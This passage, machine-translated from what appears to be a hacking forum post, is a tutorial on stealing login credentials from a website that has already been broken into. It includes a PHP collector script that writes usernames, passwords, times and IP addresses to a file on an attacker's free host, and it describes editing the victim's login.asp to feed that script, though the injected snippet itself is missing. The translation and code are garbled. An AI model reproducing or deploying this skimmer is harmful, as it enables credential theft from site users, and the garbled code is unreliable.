Article source: Firefox Forum
Remember that there is an article on the network that you can get all the login passwords using the modified landing page!
Because the ASP space is hard to find, and it is not very suitable for the rookie, I am another way!
Prerequisites, you have to have a PHP space.
http://www.512j.com
Here you can get 10MB of free
Suppose our space is
http://test.512j.com
Create a file in the directory A.php
Code
The following is program code:
//a.php $ s = "ceshi.txt"; // Password Save as CESHI.TXT $ fp = @ fopen ($ s, "a "); // Open ceshi.txt, ready to write. $ TIME = Time (); // Get time (login) $ IP = "$ remote_addr"; // Get IP (Lander) $ newfp = $ TIME. "|". $ user. "|". $ Password "|" $ IP. "|" .chr (13) .chr (10); // All data, time, user, password, IP, etc. belong to newfp @fputs ($ fp, $ newfp); / / Write all content in the newfp, @ is used to block the wrong! @fclose ($ fp); // Close the CEShi.txt this file! ?>
Then modify the other party's login.asp
I don't need to understand any language here!
The top written in the other party login.asp!
The following is program code:
This account and password used after the other party will be saved in the ceshi.txt in the directory! Oh, the preservation format is:
This is the time | account | password | IP address
This is convenient to write a page to write it out, so as not to record the record, you can't open it, it is very troublesome, it is very troublesome! ! !
Oh, I hope to bring another idea! ! !